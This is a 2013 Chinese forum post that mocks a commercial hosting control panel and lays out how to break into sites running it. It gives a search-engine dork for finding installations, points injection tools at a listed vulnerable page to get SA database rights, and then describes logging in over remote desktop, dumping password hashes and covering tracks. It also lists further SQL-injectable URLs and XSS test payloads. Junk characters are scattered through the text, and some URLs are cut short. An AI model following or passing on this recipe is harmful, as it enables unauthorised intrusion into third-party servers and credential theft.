不得不说N点实在是一个破东西& N D. Y1 m: z, d% U
就算他开发的商业版,就算商业版附带了安全设置也不能掩饰他的破烂
- A3 G, A& Q- {0 t9 Q- r好吧 抱怨一下就行了 接下来关键的时候到了
5 C' r% C4 [- ~& E* s4 u y首先百度搜索关键字:inurl: (mmdatabase.asp)
: j) M7 h% A8 Q4 ^9 o我随便列举一个: www.xxxx.com
- p3 r$ D% c7 M8 ]3 r9 w修改链接:http://www.xxxx.com:80/Style/new ... &RID=1&ID=17 m( M6 O: _" O
扔入NBSI 或者啊D等各种傻逼工具后6 d, V% ^. M2 T. }) Y$ r
你们会看到是SA权限
* `( e2 N, p8 D0 g1 q果断3389 上去 hash得到administrator密码- j+ s# z$ L. w+ x H7 D. N# e1 @' ~
擦屁股走人~8 e2 j1 b* W' D1 ?
经过基友本人测试10个这个程序5个以上有这个漏洞5个里面有一半是SA权限的
2 k2 H: O/ {% l# X 8 w; \9 G2 k' L$ l$ e8 n U a/ ~7 M
再附上其他几个漏洞页面0 S& s5 j3 e# F4 H! B5 \' D1 P
SQL:
; k* b7 H/ g3 F, ~http://www.xxxxxx.com:80/Style/flashad/flashad.asp?adid=11 |; c. B& A3 c ]* w) n6 ]6 j, L
http://www.xxxxxx.com:80/Manage/ ... ogin.asp&PID=11
# |5 f: c% ?+ H5 Bhttp://www.xxxxxx.com:80/Manage/ ... login.asp&PID=9
/ g1 T2 s9 v0 ~, n$ T1 d# Y- Rhttp://www.xxxxxx.com:80/Style/vhosting.asp?classID=2
6 z6 P- k- a2 s, X8 q: t9 C2 SXSS证明:
& F/ ?, {. n- V; Chttp://www.xxxxxx.com:80/Manage/ ... yle/memberlogin.asp”;alert(42873);”8 m1 S6 i( _1 x3 E* t
http://www.xxxxxx.com:80/Manage/ ... yle/memberlogin.asp”;alert(42873);”' j: u% d) f6 Y
http://www.xxxxxx.com:80/Style/d ... mp;checkbox2=.bj.cn<script>alert(42873)</script>
. s5 G- ]1 v4 u4 [8 N2 v6 Z由此可见点就是坑逼中的战斗机 自从用了他我的眼泪都流干了 有做IDC的朋友千万别步我后尘啊 便宜没好货好货不便宜
; J! p2 k4 R+ D# s z还是星外吧 你们懂的
M0 s) p* N+ ~( H2 I作为一个商用程序 安全如此堪忧甚至于连网上开源的一些程序都有所不如,这样的公司能走多远?3 p, O- j: A8 ~! d; G& r
PS:其实我真的很想知道你说N点这SB asp就asp吧 为什么asp还非要MSSQL 这不是好像告诉我们快来日吧我们很容易日的,裤子都脱啦,就等你啦。 o(︶︿︶)o 唉
! i8 r; I" t7 p' a2 u/ E9 J# Z——- |
发表于 2013-3-3 08:06:44
收藏
支持
反对